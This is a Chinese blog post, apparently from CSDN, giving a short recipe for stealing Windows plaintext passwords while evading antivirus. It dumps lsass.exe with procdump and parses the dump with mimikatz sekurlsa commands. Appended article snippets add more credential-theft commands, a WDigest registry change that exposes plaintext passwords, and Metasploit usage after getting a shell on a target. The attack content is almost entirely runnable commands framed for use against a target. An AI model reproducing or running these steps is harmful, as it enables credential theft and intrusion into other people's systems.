躲避杀软抓取系统明文密码

最新推荐文章于 2021-09-06 09:32:37 发布
最新推荐文章于 2021-09-06 09:32:37 发布
阅读量557 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bezal/article/details/44618285
版权

所需工具:

procdump.exe

 mimikatz


1、使用procdump将lsass.exe转储到文件

procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp


2、 打开mimikatz输入以下语句即可获取明文密码

log pass.txt

sekurlsa::minidump xxxx_lsass.dmp

sekurlsa::logonPasswords full


注意事项:目标系统版本要和本地系统版本一样 

bezal
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mimikatz使用
愿路途漫长,莫失莫忘。 愿不骄不躁,安稳顺心。
09-07 264
需要HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest的"UseLogonCredential"设置为1,类型为DWORD 32才可以,然后下次用户再登录,就能记录到明文密码了。默认配置是抓不到明文密码了,神器mimikatz显示Password为null。第二条:sekurlsa::logonpasswords。第一条:privilege::debug。
11--使用 mimikatz 提取 windows凭据的密码
热门推荐
SunShine
06-28 4万+
mimikatz一.mimikatz简介  是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码。mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器。作者主页:http://...
Mimikatz的使用心得
weixin_34221332的博客
01-22 538
Mimikatz是一款由法国人编写的轻量级调试工具,但更为人所知的是使用Mimikatz来获取Windows的明文密码。 这个件的作者博客:http://blog.gentilkiwi.com/mimikatz 作者把件托管到Github上的,需要FQ才能下载。我已经下载好。这个件会报毒,不过我已经修改了一个不报毒的版本。 原版,修改版,1.0和目前最新2.0版本,使用方法的下...
Metasploit中使用Mimikatz抓取内存中的Windows密码
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
08-24 1617
我是通过这个漏洞学习内存抓取Windows密码的 首先你需要提升Shell权限为System 加载mimikatz模块 load mimikatz 三种获取密码方法 一、可以抓取到当前所有登录用户的明文密码(推荐使用) kerberos 二、只可显示HASH(显示所有用户密码HASH) mimikatz_command -f samdump::hashes 三、只能显示当前登录的用户加密后的密码 ...
关于Windows系列密码抓取
weixin_30790841的博客
03-31 395
首先,还是回顾一下windows系统密码Hash的一些知识吧:(下面这段来自网络) 首先介绍一下windows密码Hash: 早期SMB协议在网络上传输明文口令。后来出现"LAN Manager Challenge/Response"验证机制,简称LM,它是如此简单以至很容易被破解。微提出了WindowsNT挑战/响应验证机制,称之为NTLM。现在已经有了更新的...
mimikatz 抓取 Windows 明文密码
06-02
Mimikatz - Windows 密码抓取神器 轻量级调试器神器 - mimikatz - 直接抓取 Windows 明文密码! 这个神器的功能肯定不仅仅如此 在我看来它更像一个轻量级调试器 可以提升进程权限 注入进程 读取
获取Windows明文密码mimikatz2.2-x64.rar
03-19
标题 "获取Windows明文密码mimikatz2.2-x64.rar" 指向的是一个使用Mimikatz工具来提取Windows系统明文密码的过程。Mimikatz是一款由法国安全研究员Benjamin Delpy开发的开源工具,主要用于系统安全分析,特别是...
mimikatz(windows 明文密码抓取工具)
04-02
**mimikatz:Windows明文密码抓取工具详解** mimikatz是一款由法国安全研究员Benjamin Delpy开发的开源工具,主要用于在Windows操作系统中获取明文密码、 kerberos票据、LSA秘密等敏感信息。由于其功能强大且易于...
FTP连接与密码明文抓取的实验内容(win2003).pdf
07-10
FTP连接与密码明文抓取的实验内容(win2003).pdf 学习资料 复习资料 教学资源
天天自动抓取更新系统
08-16
"天天自动抓取更新系统"是一款专为自动化数据抓取和更新设计的工具,它能够高效地从多个网页和站点中获取信息,并智能地分析和处理数据。该系统的亮点在于其全智能抓取功能,能根据设定的规则或算法,自动识别并抓取...
一句powershell调用mimikatz抓密码
weixin_30950237的博客
05-13 416
mimikatz神器大家都知道吧,可以抓取系统内的明文密码,但是平时我们测试的时候需要把mimikatz的几个文件上传到目标系统上面,然后再手工执行几个命令才能搞定,今天无意访问一个大神的博客,发现其实可以利用powershell一句话搞定,是国外大神的方法。 国外大神clymb3r写的一个powershell脚本将mimikatz注入到内存调用logonPasswords获取密码,使用起来相当...
mimikatz的使用
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-15 3万+
mimikatz的下载地址 , 提取码是 kcuh mimikatz是个好东西,它的功能很多,最重要的是能获取windows的账号及明文密码 使用方法: 1:远程连接使用 控制远程的服务器后,‘帮助’对方下载mimikatz,然后以管理员身份运行 privilege::debug 提取权限 sekurlsa::logonpasswords 抓取密码 这里抓到了administrator的账号,密码是null,说明没设密码 注意: 1、 文件夹里有两个版本,一个是对应32位系统的,一个是64位系
Mimikatz获取系统密码攻防研究
weixin_44023460的博客
06-23 4484
Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统明文密码而闻名于渗透测试,可以说是渗透必备工具,从早期1.0版本到现在的2.1.1 20180205版本,其功能得到了很大的提升和扩展。Mimikatz最新版本一共三个文件(mimilib.dll、mimikatz.exe、mimidrv.sys),分为Win32位(多了一个mimilove.exe文件)和X64位。通过它们可以提升进程权限、注
几种免转储lsass进程的技巧
chenfeng857的博客
09-06 3150
在内网渗透进行横向移动和权限提升时,最常用的方法是通过dump进程lsass.exe,从中获得明文口令或者hash。lsass.exe(Local Security Authority Subsystem Service)是一个系统进程,用于微Windows系统的安全机制,它用于本地安全和登陆策略。在进程空间中,存有着机器的域、本地用户名和密码等重要信息。但是需要首先获得一个高的权限才能对其进行访问。 在存在杀软防护的情况下,要想转储lsass进程,我首先想到的是procdump+Mimikatz 的方式
Windows明文密码抓取 法国神器mimikatz_trunk附源码
浮生若梦的专栏
08-30 1万+
大家都知道的东西吧,渗透测试常用工具。尤其对社工密码收集来说必备的 法国一个牛B的人写的轻量级调试器,可以帮助安全测试人员抓取Windows密码。 mimikatz 最近发布了它的2.0版本,抓密码命令更加简单了,估计作者也看到了对它这个神器最多的研究就是直接抓密码,为神马不发布一个直接一键版,哈哈哈哈哈。新功能还包括能够通过获取的kerberos登录凭据,绕过支持RestrictedAdm
mimikatz读取用户密码
weixin_40709439的博客
09-26 1万+
当我们getshell之后,一般是提权拿下远程服务器,刚学习了一个直接读取远程服务器的密码的工具mimikatz 首先先利用 privilege::debug 提生权限  sekurlsa::logonPasswords就是抓取密码 这是我本机的,空密码   另外当无法上传mimikatz工具到目标服务器时,可以利用procdump把lsass进程的内存文件导出本地,再在本地利用...
Mimikatz 使用小技巧
大方子
10-05 2678
1.记录 Mimikatz输出: C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir 2.将输出导入到本地文件: C:\>mimikatz.exe ""privilege::debug"" &quo
使用L0phtCrack获取密码和使用mimikatz直接抓取Windows明文密码区别总结
最新发布
03-22
而mimikatz则是一款密码抓取工具,它可以直接从Windows系统内存中获取明文密码。因此,L0phtCrack获取的密码可能需要一定的时间才能破解成功,而mimikatz则可以直接获取明文密码,速度更快。另外,使用L0phtCrack...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值